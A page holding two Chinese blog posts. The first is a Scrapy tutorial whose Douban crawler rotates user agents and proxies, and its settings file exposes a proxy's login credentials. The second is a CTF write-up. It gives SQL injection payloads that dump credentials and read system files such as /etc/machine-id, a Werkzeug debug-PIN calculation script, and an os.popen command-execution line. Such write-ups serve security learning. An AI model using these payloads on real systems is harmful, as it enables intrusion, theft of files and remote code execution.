First Look at Scrapy, with a Douban Crawler Example

Scrapy is a popular crawling framework.

As a framework, it lets you scrape quickly with only a small amount of code.

Its main components: the downloader (request) module, the spider module (hand-written), the scheduler, the item pipeline that saves the data (hand-written), and the engine.

Each component interacts only with the engine.

Create a Scrapy project:

 """scrapy startproject myspider"""

Create a spider:

"""scrapy genspider itcast itcast.cn"""

Run it (a sketch of the hand-written spider follows):

"""scrapy crawl itcast --nolog"""

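The generated spider only contains a skeleton; the parse method has to be written by hand. A minimal sketch of what it might look like, where the start url, XPath and field name are illustrative assumptions rather than taken from the original post:

import scrapy

class ItcastSpider(scrapy.Spider):
    name = 'itcast'                     # the name used by `scrapy crawl itcast`
    allowed_domains = ['itcast.cn']     # off-site requests are filtered out
    start_urls = ['http://www.itcast.cn/channel/teacher.shtml']   # assumed start page

    def parse(self, response):
        # extract one illustrative field per block and hand it to the pipeline
        for node in response.xpath('//div[@class="li_txt"]'):
            yield {'name': node.xpath('./h3/text()').extract_first()}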
Pagination: construct a Request object for the next page once its url address is known.

Simulating a login: either carry cookies directly on the Request, or send a POST request with the login form (see the sketch below).
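A minimal sketch of both login approaches plus pagination; the urls, cookie and form fields are hypothetical:

import scrapy

class LoginSpider(scrapy.Spider):
    name = 'login_demo'

    def start_requests(self):
        # Option 1: carry cookies copied from a logged-in browser session
        cookies = {'sessionid': 'xxxx'}   # hypothetical cookie value
        yield scrapy.Request('https://example.com/profile',
                             cookies=cookies, callback=self.parse)

        # Option 2: simulate the login with a POST request
        yield scrapy.FormRequest('https://example.com/login',
                                 formdata={'username': 'user', 'password': 'pass'},
                                 callback=self.parse)

    def parse(self, response):
        # pagination: build a Request for the next page once its url is known
        next_url = response.xpath('//a[@class="next"]/@href').extract_first()
        if next_url is not None:
            yield scrapy.Request(response.urljoin(next_url), callback=self.parse)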

Middleware (named after whichever component it sits closest to: the one next to the downloader is downloader middleware, the one next to the spider is spider middleware)

Used to pre-process request and response objects

e.g. setting a proxy ip

or applying other custom handling to requests

Middleware is written in middlewares.py; in practice it is mostly downloader middleware

Two kinds: downloader middleware and spider middleware

To use middleware, define a middleware class in middlewares.py implementing the process_request and/or process_response methods, then enable it in DOWNLOADER_MIDDLEWARES (or SPIDER_MIDDLEWARES) in settings.py; a sketch follows
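A minimal sketch of a downloader middleware using both hooks; the class name and the retry-on-status logic are illustrative assumptions (the project's real middlewares appear later in middlewares.py):

class DemoDownloaderMiddleware(object):
    # hypothetical downloader middleware showing both hooks

    def process_request(self, request, spider):
        # runs for every request before it reaches the downloader;
        # returning None lets the request continue through the chain
        request.headers['User-Agent'] = 'Mozilla/5.0 ...'
        return None

    def process_response(self, request, response, spider):
        # runs for every response before it reaches the spider;
        # returning a Request re-schedules it instead of passing the response on
        if response.status in (403, 503):
            return request.replace(dont_filter=True)
        return response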

What CrawlSpider does: it extracts and follows links automatically according to rules.

Creating a CrawlSpider: scrapy genspider -t crawl tencent hr.tencent.com

Using rules in a CrawlSpider:

rules is a tuple or list containing Rule objects

A Rule describes one rule and takes parameters such as LinkExtractor, callback and follow

LinkExtractor: a link extractor that matches url addresses by regular expression or XPath

callback: the callback for the responses to the urls extracted by the link extractor; it may be omitted, in which case those responses are not handled by any callback

follow: whether the responses to the extracted urls are themselves run through the rules to extract more links; True means yes, False means no

It is often used when the data to collect sits on a single page and the rules take care of reaching those pages (a sketch follows).
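A minimal CrawlSpider sketch based on the tencent example above; the allow patterns, start url, XPath and item field are assumptions for illustration:

from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor

class TencentSpider(CrawlSpider):
    name = 'tencent'
    allowed_domains = ['hr.tencent.com']
    start_urls = ['https://hr.tencent.com/position.php']   # assumed list page

    rules = (
        # list pages: no callback, only used to discover more links (follow=True)
        Rule(LinkExtractor(allow=r'position\.php\?&start=\d+'), follow=True),
        # detail pages: parsed by parse_item and not followed further
        Rule(LinkExtractor(allow=r'position_detail\.php'), callback='parse_item', follow=False),
    )

    def parse_item(self, response):
        # illustrative extraction; note that a CrawlSpider must not override parse()
        yield {'title': response.xpath('//td[@id="sharetitle"]/text()').extract_first()}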

1. Write an ordinary spider

(1). Create the project

(2). Define the target (items)

(3). Create the spider

(4). Save the content

2. Convert it into a distributed spider

(1). Change the spider

1. Import the distributed spider class from scrapy_redis

2. Inherit from that class

3. Remove start_urls & allowed_domains

4. Set redis_key, from which the start_urls are fetched

5. Implement __init__ to obtain the allowed domains

(2). Change the configuration file

Copy the scrapy_redis configuration parameters into settings.py (a sketch of both changes follows)
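A sketch of both changes following the usual scrapy_redis conventions; the spider name, redis key and redis address are illustrative assumptions:

# spider changed into a scrapy_redis distributed spider
from scrapy_redis.spiders import RedisSpider

class DemoSpider(RedisSpider):
    name = 'demo'
    # start_urls and allowed_domains are removed;
    # start urls are pushed into this redis list instead
    redis_key = 'demo:start_urls'

    def __init__(self, *args, **kwargs):
        # allowed domains are passed on the command line,
        # e.g. scrapy crawl demo -a domain=example.com
        domain = kwargs.pop('domain', '')
        self.allowed_domains = list(filter(None, domain.split(',')))
        super(DemoSpider, self).__init__(*args, **kwargs)

    def parse(self, response):
        pass

And the corresponding settings.py additions:

# settings.py additions for scrapy_redis
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"   # redis-based de-duplication
SCHEDULER = "scrapy_redis.scheduler.Scheduler"               # redis-based scheduler
SCHEDULER_PERSIST = True                                     # keep the request queue between runs
REDIS_URL = "redis://127.0.0.1:6379"                         # illustrative redis address
ITEM_PIPELINES = {
    'scrapy_redis.pipelines.RedisPipeline': 400,             # optionally store items in redis as well
}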

Back to the main topic: below is a walkthrough of a small Douban Top 250 crawler built with Scrapy.

items.py

import scrapy

class DoubanItem(scrapy.Item):
    # define the fields for your item here like:
    name = scrapy.Field()   # movie title

middlewares.py

# -*- coding: utf-8 -*-

# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import random
from Douban.settings import USER_AGENT_LIST,PROXY_LIST
from scrapy import signals
import base64

# Downloader middleware that sets a random User-Agent on every request
class RandomUserAgent(object):

    def process_request(self, request, spider):

        # print(request.headers['User-Agent'])
        ua = random.choice(USER_AGENT_LIST)
        request.headers['User-Agent'] = ua

# Downloader middleware that routes each request through a random proxy
class RandomProxy(object):

    def process_request(self, request, spider):
        proxy = random.choice(PROXY_LIST)
        print(proxy)
        if 'user_passwd' in proxy:
            # Base64-encode the credentials; in Python 3 base64 works on bytes, hence encode()
            b64_up = base64.b64encode(proxy['user_passwd'].encode())
            # Set the proxy authentication header
            request.headers['Proxy-Authorization'] = 'Basic ' + b64_up.decode()
            # Set the proxy
            request.meta['proxy'] = proxy['ip_port']
        else:
            # Set the proxy (no authentication needed)
            request.meta['proxy'] = proxy['ip_port']

pipelines.py

# -*- coding: utf-8 -*-

# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html

class DoubanPipeline(object):
    # placeholder pipeline from the project template; it passes items through unchanged
    def process_item(self, item, spider):
        return item
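The template pipeline above does not persist anything. A minimal sketch of a pipeline that writes each item to a JSON-lines file (the class and file name are assumptions); to take effect it would also have to be registered in ITEM_PIPELINES in settings.py:

import json

class JsonSavePipeline(object):
    # hypothetical pipeline that appends each item to a JSON-lines file

    def open_spider(self, spider):
        self.file = open('douban.jsonl', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        self.file.write(json.dumps(dict(item), ensure_ascii=False) + '\n')
        return item

    def close_spider(self, spider):
        self.file.close()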

settings.py

# -*- coding: utf-8 -*-

# Scrapy settings for Douban project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     http://doc.scrapy.org/en/latest/topics/settings.html
#     http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#     http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html

BOT_NAME = 'Douban'

SPIDER_MODULES = ['Douban.spiders']
NEWSPIDER_MODULE = 'Douban.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'

USER_AGENT_LIST = [
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 ",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 ",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba"
]

PROXY_LIST =[
   {"ip_port": "123.207.53.84:16816", "user_passwd": "morganna_mode_g:ggc22qxp"},
   # {"ip_port": "122.234.206.43:9000"},
]

# Obey robots.txt rules
# ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
#COOKIES_ENABLED = False

# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False

# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}

# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'Douban.middlewares.DoubanSpiderMiddleware': 543,
#}

# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
   # 'Douban.middlewares.MyCustomDownloaderMiddleware': 543,
   # 'Douban.middlewares.RandomUserAgent': 543,
   'Douban.middlewares.RandomProxy': 543,
}

# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}

# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
#    'Douban.pipelines.DoubanPipeline': 300,
#}

# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'

movie.py

# -*- coding: utf-8 -*-
import scrapy
from Douban.items import DoubanItem

class MovieSpider(scrapy.Spider):
    name = 'movie'
    allowed_domains = ['douban.com']
    start_urls = ['https://movie.douban.com/top250']

    def parse(self, response):
        # print the User-Agent that was actually sent (handy when testing RandomUserAgent)
        print(response.request.headers['User-Agent'])

        # one selector per movie entry on the Top 250 list page
        movie_list = response.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div[2]')

        for movie in movie_list:
            item = DoubanItem()
            # movie title
            item['name'] = movie.xpath('./div[1]/a/span[1]/text()').extract_first()
            yield item

        # follow the "next page" link; it is absent on the last page
        next_url = response.xpath('//*[@id="content"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()
        if next_url is not None:
            next_url = response.urljoin(next_url)
            yield scrapy.Request(url=next_url)

Finally, cd into the project directory and run the spider:

 """scrapy crawl movie --nolog"""

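Since ITEM_PIPELINES is commented out in this settings.py, nothing is persisted; if you just want the scraped titles in a file, Scrapy's built-in feed export can be used instead, for example:

 """scrapy crawl movie -o movies.json"""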
Original: https://blog.csdn.net/weixin_53227758/article/details/119080482
Author: 小赵呢
Title: 初识scrapy,以及豆瓣爬虫实例 (First Look at Scrapy, with a Douban Crawler Example)



Related reading

Title: oh-my-notepro

Key point: computing the debug console PIN

After logging in, testing shows that the note_id parameter is vulnerable to SQL injection.

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23

This yields usernames and passwords, but they are not of much use.


The PIN

The PIN can be used to log in to the debug console.


The PIN calculation script for Python 3.8 is given below; it needs the following information:

  1. username: the user running the app, readable from /etc/passwd
  2. modname: defaults to flask.app
  3. appname: defaults to Flask
  4. moddir: the absolute path of app.py inside the flask package (obtained from the error page)
  5. uuidnode: the MAC address of the current network interface as a decimal integer; read the hex value from /sys/class/net/eth0/address and convert it to decimal
  6. machine_id: the docker machine id; read /etc/machine-id, /proc/sys/kernel/random/boot_id and /proc/self/cgroup, then concatenate either of the first two with the container id from the last one (a small sketch of assembling these two values follows this list)
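A small sketch of assembling uuidnode and machine_id from those files; the machine-id and cgroup values are hypothetical placeholders (the real concatenated value appears in the final script below):

# all values here are examples read from the files listed above
mac_hex = '02:42:ac:12:00:03'                        # /sys/class/net/eth0/address
uuidnode = str(int(mac_hex.replace(':', ''), 16))    # -> '2485377957891'

machine_id = '<contents of /etc/machine-id>'         # hypothetical placeholder
cgroup_id = '<container id from /proc/self/cgroup>'  # hypothetical placeholder
private_machine_id = machine_id + cgroup_id          # second private bit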

app.py path

It can be read from the error page (the traceback shows the full path).


Read the MAC address

';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23

Then convert the hex string to a decimal integer:


print(int('0242ac120003',16))

Read /etc/machine-id

';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23

'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23

Read /proc/self/cgroup

';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23

Calculate the PIN


import hashlib
from itertools import chain
probably_public_bits = [
    'ctf',                 # username (from /etc/passwd)
    'flask.app',           # modname
    'Flask',               # appname
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # moddir, from the error page
]

private_bits = [
    '2485377957891',       # uuidnode: MAC address as a decimal integer

    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'  # machine-id + cgroup container id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Get the flag

After obtaining the PIN, execute commands in the debug console:

__import__("os").popen("cmd").read()


Original: https://blog.csdn.net/shinygod/article/details/124329579
Author: succ3
Title: oh-my-notepro
